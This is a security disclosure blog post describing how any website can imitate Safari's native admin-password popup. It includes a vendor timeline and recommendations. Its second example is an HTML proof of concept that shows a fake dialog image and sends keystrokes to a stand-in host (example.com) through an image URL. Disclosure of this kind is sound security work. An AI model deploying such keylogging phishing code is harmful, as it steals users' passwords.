Safari zero-day: any website can request your admin password through indistinguishable popup

If you enable two-factor authentication on your Apple account and do not use fingerprints then Safari will ask for your admin account password when you visit websites. This happens at least once per day. This popup request occurs entirely inside the browser web chrome.

Pop-up

Discussion

This interface is entirely susceptible to a phishing attack. The victim will be wholly unable to distinguish between a legitimate request from Safari and a forged request from the web. The impact is: anybody operating any website can cause that popup to occur on any affected Safari user’s screen. The website can then collect that user’s admin password. The attacker can use that admin password to access the computer remotely (if SSH or file sharing is enabled) or to access the computer’s contents, even if protected by FileVault, with physical access.

Additionally, the way this is implemented in Safari uses a private API which other app developers do not have access to for their apps.

Live example 1

Enable two-factor authentication on your Apple ID (we have previously disclosed security flaws in Apple’s two-factor authentication and why you should not use it).
Visit this web page.
Fill in the below form with any email and password.
Click YES to save the password to Safari.
Restart your computer.
Visit this web page again.
Click on the form.
This will prompt for your admin password, enter it to auto-complete the form.
You are unable to know if your admin password was sent to Safari or to William Entriken.

Live example 2

The following code demonstrates how a password dialog can be produced by a web page which is not distinguishable from the dialog that Safari uses to collect your admin password. Additionally it will steal the first letter of the admin password and transmit it over the network to a remote server.

THIS IS LIVE EXPLOIT CODE PROVIDE FOR EDUCATIONAL PURPOSES ONLY AND YOU SHOULD NOT USE IT IN AN ATTACK.

<html>
<script>
document.onkeydown = function (e) {
  document.getElementById("img").src = 'https://example.com/?key=' + e.keyCode;
};
</script>
<style>
*{margin:auto;padding:0;text-align:center}
</style>
<img id="img" src="data:image/png;base64,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"/>

This is highly compressed so the code will be easy to paste. A higher fidelity image could be used to improve the attack to 100% indistinguishable.

Recommendations

First, Safari should not use private APIs for their revenue-generating apps (Safari supports Apple Pay and the default search engine pays Apple billions of USD per year for the privilege). In a more just future, some national regulator would bring suit again Apple and others for this on under competition laws.

Second, every macOS app, including Safari, should not have access to generate popups for account passwords using their native chrome.

Third, the local user account password should be treated differently than every other password. Windows XP was more secure because you needed to type Ctrl-Alt-Delete every time before typing your local password. (Maybe newer versions of Windows do too, but I’m not aware of them.) This will improve the security of the local password and therefore FileVault 2, which depends on it.

Disclosure timeline

2019-05-05 Disclosed to vendor with notice of intent to publish in 30 days
2019-06-06 Vendor interpreted that this as a normal web phishing attack, documented in https://support.apple.com/en-us/HT204759
2019-06-07 Explained to vendor that the issue is Safari’s failing user experience, since a Safari user is unable to distinguish Apple-provided and web-provided popups
2019-06-24 (No response from vendor) Published as unpatched zero-day to Privacy Log

▧

Comments

There are no comments yet.

Please discuss this topic anywhere and let me know any great comments or media coverage I should link here.